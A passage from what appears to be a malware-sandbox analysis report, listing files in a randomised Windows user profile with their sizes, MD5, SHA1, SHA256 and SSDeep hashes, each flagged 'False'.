SSDeep: 24:cAYY+fyPgGKpp+AFrGvvz0sfIzNeybr0FmqxWKIJNnKD5zC0/7K1vj1hKQrBWUFX:chYHg9X+A0zhwzAcqYNKD5esmt9rrVD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Gtis3rDzqOHJLSemRMN.odp 21.60 KB MD5: fdcbbad7a60caf14a8f1bb807cdbb7ac
SHA1: e6eda0135925202d058e791426bd5b0f9b196fde
SHA256: c2069c981b500384c22e3afb099db764b3956be7acf7c63d5d88c7281760a6d0
SSDeep: 384:Y4lv2mnlB4E6Kb6LC+QQsH9vqWnL1dqmvogRDuxFujSSOtSOpT/f/H4Lw5i:Y4x2mnlSwKCzIWnL7JAgRDGFujS+YDIR
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\sKevCgi1Mzg9JDdGUMsM.flv 56.06 KB MD5: c2a0adaaaeaa545faa9ae966cf53a613
SHA1: 8e2c15381047c4722ff4d692fcc7a5f9f8cb629b
SHA256: a116b359ebc704347f5dcc73128ac4c9e3db3b84dc168f626a08e8794916e483
SSDeep: 1536:r11Ssf2+Hcr+o6swvuARJtOHUIJMtlOUcHBRYZWeG:rDS+2wc6DskRqHkcHB2ZU
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\0d9kggXW.pdf 36.12 KB MD5: 01390a497f954693a3d2eac94b5c52d5
SHA1: 392fe00b5e443a9735f427210a50f490cb8406b7
SHA256: 37c62e0d4d64c6d685e6f7b05a112abab0e085bd207c6b1d763f924b1b3f5c44
SSDeep: 768:A3TO+MIqFv+1bXgKbM8FkdWTUa9GycyNsG4y0C+8bRuto+H8PD:A3TfMIqM1bX1g8Fb9GyJflMto+H8r
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\aFuREbY291J9.rtf 62.46 KB MD5: 28c1166f91e5acf90e1ce4833a856309
SHA1: 898ea21e372f21f05ca3502c900678039c31bdd6
SHA256: 5dbc1573ed5d2df0271982a4f33ba14ca65d81afd760f6c97f78253791bcf606
SSDeep: 1536:pAL8RF6Me8c8oUTcHIpA9yhRxuq1gQfh1U6xeASwqXaVFtlPIaF2R:pAL8RRNxo/HgAwpusgQfhzxemqXavbTk
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\bhC_ABvBjR.ods 77.20 KB MD5: 4c0f324e5a9da806e9f36fbd3daec4c2
SHA1: a02c7e4937b698541e01751d2af11b87efafb2b9
SHA256: 8ee6059c843142459dc4dfa7001f9815b5baa821c7d0af00aab1429ef2a2f375
SSDeep: 1536:CVea2x7u7fyZNpzJ6ctiv354N9yxuBhkYkjNQMYMGYaWOkoXqDX+i4Lo:CVj7qf1JdiPqoxy1kjr1aW5qs
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\hK5LQd-AxtZKvzbn.xlsx 28.58 KB MD5: f3080711e797fa9c993ebedb27eca9a2
SHA1: bd4555d48d1edc9aee31a6e690695b937a5c7f04
SHA256: aee5972c7aad918da63e6e243df23be24cbd01883cd62086a3357be19353aade
SSDeep: 768:OkqB4IyRcKHJ0z17whWudpOipirXs3fLWw4G4X:NRcV57nkBpirc3fLWw4/
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\lbsR.csv 32.07 KB MD5: 48803b713c5b3e96b48dadda25467880
SHA1: 3deae71b79dc4adc66dab8987803c375a8d5fbf7
SHA256: fc9d6e47967b80ced0de35bc96d9f2cdac6bf3a30bd6e3bf22666fd4e5f86ac7
SSDeep: 768:Qk3bN5sKDGFSAd1KHEyGANy3C8Hkxn/hhoE++8ifE8azL:Qk3bBSFSSDDkxn/n++8Qgn
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\pelEM3i4e4Jx_4 Wkx.pdf 26.14 KB MD5: a6147813e53c6360431fd0fcdf68be41
SHA1: b1190c8a568fa7ac97113366a4fc7211f2665529
SHA256: b5a81a40c3d9619d5d01e0eef5fad625a1454df0e2feac8a0e1b07121a7bf1d3
SSDeep: 768:b2GYpjo7Xv19X5DsvB+GEKKN64xt3D4hBxSXO/stKFbR:aGYt2Xvb5wvB6KKjtTyBxSXO/fFN
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst 265.08 KB MD5: cff98993381af2a66a11a2c54b474d3a
SHA1: be66b5e87e976f5a9c349fdea3fdc17167b87230
SHA256: ee76e9556ca4bbc0ecd5d6485b9b8a2d6a32700dfd54a94ba2eeb3b9cd323b41
SSDeep: 3072:2Qy3R+PG4WaC+pdL+DSuifSsqhp65y6dDRphpycX4gHGpZvMkVWxXoOsUr:gkP8qSCqhp64ynyJS2NMkEtJsUr
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url 314 bytes MD5: ab7ddcc2bca7350586608cc3261f4036
SHA1: 98b04ce4bcdb35bf12a154e1689033d7da274cec
SHA256: 46d49718034c28357dfe334f3cbac37ff10905ab7f63613bdde171e5165a3e9c
SSDeep: 6:JH8/EvTNzL1B9ILOUhv0HbWAuTjgwrKxCnxhid+HBWUFcii96Z:5T9f9ZUp070HCQBWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url 304 bytes MD5: cc836362edb1d3bb48e1e868251e7cb4
SHA1: 7ff69b9f92b3212bd5d17c72e335901155f84522
SHA256: c2b2e3c7a21879a7a94d344f73d8dbe15c3a334eb37bf1eae6ba5293f1225df7
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZADB5MM/0NmVHMbAoZElsUIaT0zt9HBWUFcii96Z:5T985QTDB5OEH8Uu7BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url 211 bytes MD5: 44ddf471d93bbd22f8329867c590e7ef
SHA1: f98cda46547c298002207f0d68b7db1954f79d04
SHA256: bbf7263165a75979613d58af054ac82758f2c30885bffbea72cf2388300a7348
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZAQKSHBWUFcii96Z:5T985QTH0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url 211 bytes MD5: b4c2d0ff21a0170d5efa33853d4ccf53
SHA1: eb75b812144b378b413b5decce7aee382eded44c
SHA256: f1267a4b69806406e38b40e451d556c3d90904a67751bb8a94a097e1b0999f2b
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZAKxKSHBWUFcii96Z:5T985QTKc0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url 211 bytes MD5: f34854cee5f76c493e4948926a620233
SHA1: 4af85d4bb85603e2035d962f58eb67f11dc24641
SHA256: 6fd9527738e3cf4dbfa6ae3a1a8f1e4b3a80e61f978ff1e23451d0e440dac136
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZArVyKSHBWUFcii96Z:5T985QTL0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url 211 bytes MD5: eb6f94e96dbc817f7c4fd1fc6820667a
SHA1: 14ffca31ea9d9326b841d7e0e411dee6c4421e20
SHA256: 4bbc9a7c9043a203ecde35c0a2d3286ebad9464fe70401fe87f1d2688a040e52
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZAx/xKSHBWUFcii96Z:5T985QTxE0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url 211 bytes MD5: 753063c368f9616df5d078c2cb1d7484
SHA1: a7711a30b3ac77919edc0c80486de5d250afd59e
SHA256: 9a57ad0f95dd1fc00ae5cc25cca12c574744a244d972124091aa5ee91b065f11
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZAxNCXKSHBWUFcii96Z:5T985QTxf0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url 211 bytes MD5: 09936bfdebaf106548ba692519d5d07b
SHA1: a0716cf5d8d32c37efffe2f9eef1fb09c1f6a581
SHA256: af057014df77f0c3750b01ed9ddaab9d2f5005f95ad00aad5e57eb0c8931ee27
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZAGKSHBWUFcii96Z:5T985QTl0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url 211 bytes MD5: 2e130da62e47513b4d91e300a4d64f79
SHA1: 8c5a7cb1f9148d10c45c2ef0768d187f869cf831
SHA256: 18a85f190212a294a4a03e231f6d221f399cbd934fe918e61f1ab3251826c261
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZAtxKSHBWUFcii96Z:5T985QTtc0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url 211 bytes MD5: 6c5651c5fa1ee2fa828f4c38814ffe37
SHA1: d7ebdbbd2b0e8398289c05fec014fa01e7f21722
SHA256: b665c1c523e5e6ed576bc76a4590414676345e826d14e529895c15699eca44de
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZAxx1FKSHBWUFcii96Z:5T985QTxx1A0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\z2lk.jpg 52.43 KB MD5: 6dfba947b80c54fa514a84aeca46042a
SHA1: 2079376eb21fc5716045e228fba633308b88e17d
SHA256: eddc713b81b442ff8c3a12a3e31f5973521761ff0850f35f009bb74ab64870af
SSDeep: 1536:6LPgl7EX1Wadh+GW1VBGA6E17Lnb9VGcuOD0DKn0D:6LabaH+GW1HGA6EdTLGcWOn0D
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\P1zhXc0ibiHP0Bs2v5.gif 13.45 KB MD5: e1f9f0f583e550eaefbd75ea35ac1855
SHA1: 32ec3e822933b0892f6eac2ee4627e27c4f95a88
SHA256: e3adde70a75a3bdca722a0a37fd2c65c27c15ec9479574c24d4646e264f37a1e
SSDeep: 384:SEwSzUPtC866JuuRqEnDJL4kQXgUjEyEeTY:C1C866JuuRXnWgU4cTY
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\l6LO.bmp 40.46 KB MD5: 7fb2c497ef00b4fa46754172e74120ca
SHA1: 57d62fe9070d0943b4ac0fdcb08f812eac33aa1e
SHA256: 81a19962c9275aba7bd54e8d1632352130ff6bc4b6450fded763c7323ad5e298
SSDeep: 768:04M1HdU2+LK8Sh7vJVZAyBXkF7cPFfWySG9Qy4EEi4+l2DaTs:0d1HwLKB7hjAyBXScPFfWyZ4EEi4r7
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\MFSIcW7l5OKlh5.gif 60.48 KB MD5: 22bb2f5d1d43777e285be6d89057ff90
SHA1: 2bce63abf7322da8f8a3b5302035f685e62d96a3
SHA256: f02a1d575f910faf7ee0dd76cd9d6955a0afd86e79d4dac1fded65d24f6c483b
SSDeep: 1536:nmjoBHIZ0mO4GpnNL/3SJzgFYR2/CXwlJQW3:nmMByVyNL/3ShgCSCXwlJZ3
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\WQb DhJ7Wo.jpg 91.93 KB MD5: b8ec5050f8faef356a879fc235499c68
SHA1: b95e6957c4d001de5f24d6ca85c85978463986c8
SHA256: 14bfac4f97ebd94950b44ab3d5e85b82ce369320170af8532689f1440793c9ea
SSDeep: 1536:CUkhk+0IkHUqDoeEdSQzdeiQ5oJ0pTvhubkv4vjLeHbNTgBTANiYi5Qtr+poYL:ikrIknDoeEdSQzdk5E0pjhujjwpgiAYq
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\BoizzI4g97t.flv 67.73 KB MD5: 962ac3394ada275ab79ef7ba99b8820f
SHA1: 369ce9b666e13f603a8c84fa07ddadd1595508bf
SHA256: 36d07f619bafac359a2db344f8ca2f87f0c01de05706428f68ded0eb5a26efd2
SSDeep: 1536:+hlGkhFOdYEPwKBdMLPs/bgKN7tii8wCZVGLHZLLsntrrA:+hkuOOlKB4E/Z7tidVkLIntrA
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\Iq gbMO_n.flv 18.89 KB MD5: 46d6bfa75273dd2e188d965e16b5ff44
SHA1: afe51c9c915654dfbd2592824c6bf489ecf43b67
SHA256: f52e649dbb45354a8b46fa41558b02256040b241fce2bf372a8737d9ca088102
SSDeep: 384:BI2nATbfC7UpW4wcRD8MC15r9g3HYeM9iG8dod/sCsQYMFUAFnAIuFhuEoiXL:BI2gMUpWGRDRC15r9BriGtslQYc/8F80
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\UtVdyOv5.swf 19.12 KB MD5: 3ac16b9c5a693da18f87266a01d09aa1
SHA1: 63ead171308f025928dbda5d56d2773e9333bd82
SHA256: f4981308b6a9d62e60504c27ed94bd88a61720283cc598e2c1e519493798f95d
SSDeep: 384:R+mKWc4i8mndC0f17VLtY1N6G22ar2D4j7mT:IIcdJnzd7HyE3r2XT
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\2BSi.ods 25.51 KB MD5: f538ce94948f0f6c2792584d19105d67
SHA1: e44bcc922180f3680b5526746c42766db5c96e79
SHA256: b970ed07b4f8fedc465b4db3e955a464d8f17af27935bba576ea16e2bc84997e
SSDeep: 768:zoIspS05l/qB1MqJWK5k4uyUWp5F8HDogwQ:zoIs4Gl/qsmWZ4zUWDY
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\eOYyRR2EObYB.wav 4.54 KB MD5: b3c2fc3105e8f052de57bc567a02d1dc
SHA1: c35ea70eef99178acaa27257239e8700e91f1e09
SHA256: 769523deb7ca18cf2b68f45e7c93882a5daf7d6987ae6b290ed5b6a3d43c6544
SSDeep: 96:Z3YmyRcez/FPoS7CxdMG2+b8ye+1u9ICR4/u09hY/xKWrDMZgTfkxuvC4l:ZomyRj/BoSwdMG78/KMR+9G/guqkfpaG
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\eZfj5ZvjMOZ.m4a 71.41 KB MD5: 99c7e83576f1b27aa187005be5d95ee5
SHA1: b4255460999c846eab602fda5902b18afa04fec0
SHA256: f7571654a6de86717275128c795a68f43ab175a5875a9332d04b894de9b3a3a4
SSDeep: 1536:8BFI1SsmuFkE5aazIlQimr3gffx9pqZFSVk31KqDqKWKEVXlMZ+p7OXsCTB:8BcSsDB5a/mr3gXcfS+RD7GyJTB
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\O7mIpznG0.gif 83.23 KB MD5: eeb92d9d45ac1cbdc78a220c739acda0
SHA1: c80a2e9cba32281b7ef944993f7eab7af9d7e4dc
SHA256: 78b64eb3e76982ca0f6c181be1d533956c82590d4d8bcda9fac8832b3d9567cc
SSDeep: 1536:x7nKl3vFBYNE6NKPW7Zr++/fFUKVPeNvVNXqX3avKmxWCI8d0:RKlNqz+Ci+/fFUBpVNy69xQ82
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\qDPtFMhAiJ2xQ vm.odp 90.47 KB MD5: 227d6820438525982c96bf3ae9631aa0
SHA1: 381f408b6b87897134b185cc1cdbc3adf3e9dac4
SHA256: 23c982d009afbf9fe4ff843d21f0af74020734a6a0892f5ca57273a8df454fb1
SSDeep: 1536:yMe3O+Ae4ubDtI7Zc56oQeKC6E/2pWYI1chdS87dFcm272a3K0ttTay/YgmVuwUh:yMgMTuve7MrKAWyc28Tc2iT9+Vsh
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\1TiNgxSzmOsn7Ri OkP.ots 42.22 KB MD5: 6ca14b22503f2efef77a26b4d6cfa4ae
SHA1: 7df05a129790f4732ab134f3e7abf91d2c4f20c9
SHA256: 22b17ed98d4c033cf33716d306a4ed09e2e9641eb4c22bb891e390d7b37e7426
SSDeep: 768:izzrFMQhk/excDr1JvCY6RMAU0vMGXe6xifxe9XnL6FnWUmKPMTd8xkZ:izFYecLvP3iJFxifxHBPEL
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\faBTC43kElpNlGMFau.pps 89.99 KB MD5: fa96f029c530f21c56d0255f90c60744
SHA1: d08d128399c6b990fbdd827073b82d8feaff99a9
SHA256: 4562882780a3e228fd4b9e203c3a8857cbdd6fa9608d7db68eb8954e13f14820
SSDeep: 1536:6MOax3EEX/yPFFww0vMnzjAlJZsazPRmTKR6uPeOnZ4kCNCAY6kVDvA:6glX/+0vEzjAzXR6TqZ4dTY6qA
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico 29.30 KB MD5: 9970368b4f9e17803aa4867c505b2a91
SHA1: 8a0a1f2a0b5f4a8c1eaedea288401a3fe6f20b9a
SHA256: 266ad874ff5cf30d93da9b2da235c2ad6ae7f75e7e1b9de7178d7ceddc6dbd40
SSDeep: 768:EsXZcc1se85iG5T0p9oTS4WUmhndIS1w/oy+romaEACNOP:EsXr1svkmT0pL5dISooy+Um3ACg
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\CugNJ6pb94kQCPMiK.jpg 13.66 KB MD5: 4cceec2e7d1eb5cd36acc8bd5ed74c71
SHA1: 8c190c679607f9482fcd4cd08675912f7fb8c562
SHA256: e328384089c8445993721a726595990c9d35e5f8773d455a7ba79c8bac4ad438
SSDeep: 384:doM/QNyE5ASdW5GAQKLB012UsSzQ7qN4rQHGKYDR:tQ/A1xLB01kQ4rKGKYF
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\pySmPr79Heo.png 23.04 KB MD5: e0bce824a0d893b6db381f2ce422fb56
SHA1: 8bc863daa2728d68fdd059c310d61f13f24152e3
SHA256: 2d9d75138057caaa09ad9ee9d7a04a5a66bdbf90d941dd3ca8c8928a2e937d9c
SSDeep: 384:AV7w4B2a/mFYTaNUEqVvL2l94AZbiAlPztn62KJipRViOxxS6/DPA:OZ4040aNUrSlJzlrN67MXDSq4
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\Zusq yA8dO-j.gif 97.33 KB MD5: cbf84c56f7ce2e00d94d96a07ed8cf5e
SHA1: 6ead5619b6cd2b686b2bedea8d66481592f99217
SHA256: a1fc5af1df8725902b28e4785aa4ab6b29424ba877899f1d94085d2fae2fccc9
SSDeep: 3072:agRXnvjNYCw7C2oBwojCVPD33l+26gRlwvHw:hRXbNbvLCx426gRaw
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\KZrZHmvQBeSkBOCD.jpg 10.45 KB MD5: e1f0dc29d47ce59fac6a49872665047d
SHA1: 7910dd89027bf20420df50c8338f7014d404d894
SHA256: 5e6272469fca7f16d68e2ab1aef36370655c0450a5069e93ef4c57f707f3d921
SSDeep: 192:eY5HltN/qZzL9UT3bNwl5VvaR+YqAPJz15sQIYOaC2MuPhmYAwTXU:BRJ/qMTRe4ROoZHsQIY7C2MuPhB+
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\m7Zhy4P-VQ66.gif 65.75 KB MD5: 39875c304672a19ecdce6086f1c52638
SHA1: 381a1d160f26c3e0f3d74993b53301f25cb38509
SHA256: 84cd5d6979fac6bb435a1e7a6c62727426b608843389c5a5c337d3bca07d1cad
SSDeep: 1536:K+o7gb5DFioJjmMrTicznvuzUp+d62VuTpi6lMqnfAMr0gps:Zo7GCUdrzzv076a8VuqV1y
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\3Bsx2yMEE1UNteJQW\OQg8wwtsOsz4VSDTpD.png 73.73 KB MD5: 199b83eec418ad8832710ae05f01dd01
SHA1: 30b16ddf146f7a498dc150e3daf88980d46d7f8f
SHA256: 9670f8f0954291a987096207451080ece8f20dde85acb00fba37f51f9b9bde73
SSDeep: 1536:rdRZzMR8lcwTyAl3LniNTSq9hnlaX9ljrf25oGMHZju9AbK4+q7zcjHvMbBHjs:rdRZzMR8mg3ONT+NJ5jEAbz+6V4
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\bbyLspO02\y lRKLTJHdvF Q.gif 89.26 KB MD5: cc9aa524142f35105397b5d74039bc46
SHA1: 4662625cb83e4bcdbcb7a092767749e5c9928914
SHA256: 35f498f2492dd74429faa0efc92264c387e1034b709d95589db22f4c527bde89
SSDeep: 1536:yBC8/Cy35pVMNeEV7hCAS7AbLLqPZbN06qdY8q+oLhDKE98ECs1LqXh:U//Nb297szKSBbR8q+iGE/Cs1Lqx
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\eyP8XnrLY rQ9ZYZ.gif 84.64 KB MD5: a2c80b3613b0c89d6e90bee5f6993779
SHA1: 8ebd6943a5d2f57689b915707cb8da507bb0e604
SHA256: dc43de4bc4d57f4fe1bc0546fefd60190bc3c94ca83473f840901ece56717f23
SSDeep: 1536:46HTyXBf/sjOz5sYkSb2RyUAHJmknKxiGcEAxNdzPN6Fr3tSMlbmTuv:46z2BHE2sYkSqRyUAHJmVxAJNdh6Z3QS
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\lfJNr8tOZ7oDHun6ukoV.gif 43.35 KB MD5: 1bbb003c5786fe9dfe855fad703c4c94
SHA1: fda3679e1e08a940d8e78201550270b7fc2bfc03
SHA256: 4a1b3e0ec3c42889b7d98342ee5d6af61bc46261e5ae62ae2cc5a85998d5a6da
SSDeep: 768:AC1dzaj9LLvHk1VGIFm5acISVFvEZ0KSLtp0o7iuth9X/tRBeoeO4fns7Mzc:AC1duj9LLv6GoO1Imi0BtyoWazVneJs9
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\VFWyDHM.png 60.96 KB MD5: f88db3d6f26d7355cd038d245c10cab4
SHA1: 5751b5c5d13dab47ad5a71c86cd7a71f272fe213
SHA256: aebff11de1c88a9aa8c6f4623b4b606e0b0fba2f8c7472892b9f9ea9c214296a
SSDeep: 1536:Rz6Hcdw3ZKw+0P6PITOG4eBLZmB4cGuW7rfjFhzDEl:R2HcwpKw+0SwTODeBqTIr7El
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\a9qF7OuHrZ4T.flv 15.57 KB MD5: c296eb305fd7db0e587eae8be2be2377
SHA1: 7d4af68dc3dbd5da82e67abf409376c8be833e02
SHA256: 2956ad2eb1c54ff93678471e88a44babaf3319626b881a0f30c218809699481b
SSDeep: 384:1GUqNbxxX7xlnHPYaPe7IXJchQtdyE1oc2QJsR5XQFtx9k:wUc1xlPe7IChQfyE6c2QJsRuc
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\KEz1B VUjzGhZ.swf 77.47 KB MD5: 27421e592442f4a8d526a2a764620b1a
SHA1: c8e4f3aa54767385dd1428186afec88f88b32222
SHA256: ea1cb5ac8385043c34042b7078e6c91c0f1b1c1c0c16c2b570a1f120cfc8151d
SSDeep: 1536:LuTgdSAk3xIyNhSTaIhb7qmQ/8dkjMBWYjSkcOthj2k1rpYaIFiYp3B7eIvo83MS:LucdSAdyLiiTj/YWkcnk1rpYaIFic3Bb
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\RrLl7FRJlURSY01.flv 35.06 KB MD5: c4eecd5cc661d79c3cc4c6885b6c3114
SHA1: 4f95cfb746b2d56eb854531c69476df133e3eec5
SHA256: 93bba8111a04097edf780fdae9de97ca4cf138334e2cf9020a89b0062b8b3be8
SSDeep: 768:wH7leNtM75AxctuuotF8xrJ2v05x4so3WrI/1xwVh4:wbUN4Ajyvx4srr4qS
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\5ETH-YOt.pps 84.58 KB MD5: 5c6fddf1f3617e462de165d564daafa8
SHA1: abf636895598f904561e4d8437a1ec547e3a7c76
SHA256: 3c76886fee17e07bdd68697019d26297294063f5e50d04b2ab81e1d0c555d5d6
SSDeep: 1536:skJLn8eBnvAbot5VzzRubFfKAyquWYvsskzXnNY4xj1gAwnYRRHZfBPMQ:skJLpBnvMweFyAyOGsL7nNXxpmoZfBUQ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\5LxZSjV.pdf 3.25 KB MD5: a0403b697a45aaa908cbe14b34cc359e
SHA1: 87a7d8de5fd77316e8035236a8bad845bc807a8b
SHA256: d1c90834941ea3cca06fdfcff1c23e81011298e7407274bb149e03a014271b24
SSDeep: 96:fVDVRB1jyD/30t6/LtJKBFluAAd2mhjLwCuU7PSiDYJaR:VPyDP0t6eihjLlSHaR
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\8GBnXsZ.pdf 3.37 KB MD5: d730f22a63ab5096eaceb00eaab221f7
SHA1: 9ebbe64ca8b3b76f01f11df25ab181e20089a482
SHA256: 13083e6849870ddc2e94a30be4e2255294a0f931caed8efa6ae16c685b35506a
SSDeep: 96:fVVGvigHErNKQ18asb+AqIWTry4oCq/XgDOjJEhsW:jG5HKNV18afAFKW4E/XwKWX
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\aVltm_fp_1spcSpiUB7E.pptx 80.37 KB MD5: cfd0b59f43d37d03a668735920b78777
SHA1: 8d6a6ff3fe195329558046d043ff729dfe862f47
SHA256: 23ae7927173eec746e11a70b2732c6f53275f7aa979321690c2cdb8dfb96d2b1
SSDeep: 1536:iHslAEAHzkOCGA/Z7JwOjfe3DdLVcq+PfboXIMxBOGfuRK5/UBW9vvu38Fi3/hLl:osltAHy/e1p0b/uxUBW1vu3VhE/Xj07J
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\dthjAR.odt 83.67 KB MD5: afe4072d58f32287e47340609e8e1c0b
SHA1: 539a7f867ec28aec1bc13687f149954f7c97a6c6
SHA256: a2658a660ed3d08a8f046099b069def8d5cf96e3e6ccd01f7ffe2dcd7339cf02
SSDeep: 1536:SGgaJK7wVEkyW1eCGc8NKbcKZSvfyXrCyG8Z3pqf+cfszLhYASAlSujiQl:ScsCakQKZSX2qqcWWCh5SAllD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\HOw3I9OnurIF0.pptx 54.54 KB MD5: fe10c05b0c9889f069208b428e9a8f46
SHA1: 7bee041e4f1dce999c4a38d862ac3b06add8070d
SHA256: c5272474c55178c0a1d8c0262651b05ef8465f51baeb3d1e542752ef828f5969
SSDeep: 1536:VtgVx5AG0NHQ+mT0WSzB64wMbNIOQTn1oIPbzcsG:VGVxP0940JzB64wMbyz7ng
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\kLhp.docx 78.43 KB MD5: 4c17eccfdf4eb49fda9e8f268db51201
SHA1: 30f06a1b6c56fe31cd0bb6f49c82c0e8eb0d6228
SHA256: acf28eed2a462af5f13ff689c3fde01abd478f2d2655058039f076bdc269d404
SSDeep: 1536:neW0fBalraXrAeSCS/ovea+nt/zB/JFoylz3rc+cqDTViNr3QpnFWrBkhrHDclQY:eW0Zalr6BChaQNJFZ5Y+cqXbpMwrHIlp
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\M85S8 e0deSz1O2lZp.xls 96.37 KB MD5: 9b3625eea8114e20733d0f0805336bee
SHA1: af79f0407a1cd3587ccdafd37208eda08e157fbd
SHA256: 8e274cf29e02c9bd5721838b95f64c2c8a84cd8f949b87fb8805772b6230fa71
SSDeep: 1536:Z0WFTNdHiMQdR3ymLIsNuqoNRR69Kq1s2UfXN/jsgLerz7JPe7KZxlA10KWbXjd3:TrxYdZymLJNuHN7NG4fLcVDbJb+c
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\pbZLWA2gHx6B.ods 42.59 KB MD5: 80f339b9c96a15ba41cab21f383dc266
SHA1: 88ef9f07b5449260b17bdc875d85380d5f018fbb
SHA256: f08a845639c5d75c08fd4f143631aba20daea0c4d9c730fcf0e46540295b7733
SSDeep: 768:Ei5Y3KWKW8HapxBeYZW9nMnh/BsM3tpTXzWioCnU55z6yfZpjIthe0DB1nYKXETQ:Ep6gLeY4Gh/BsuHWilU2yZ9Ithn1nrUk
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\z ACbUu.csv 99.53 KB MD5: 99f12534ad991394df007583e678bca1
SHA1: 1b86fc71c8b87ea1b7ad9bde418d4916fd7270ed
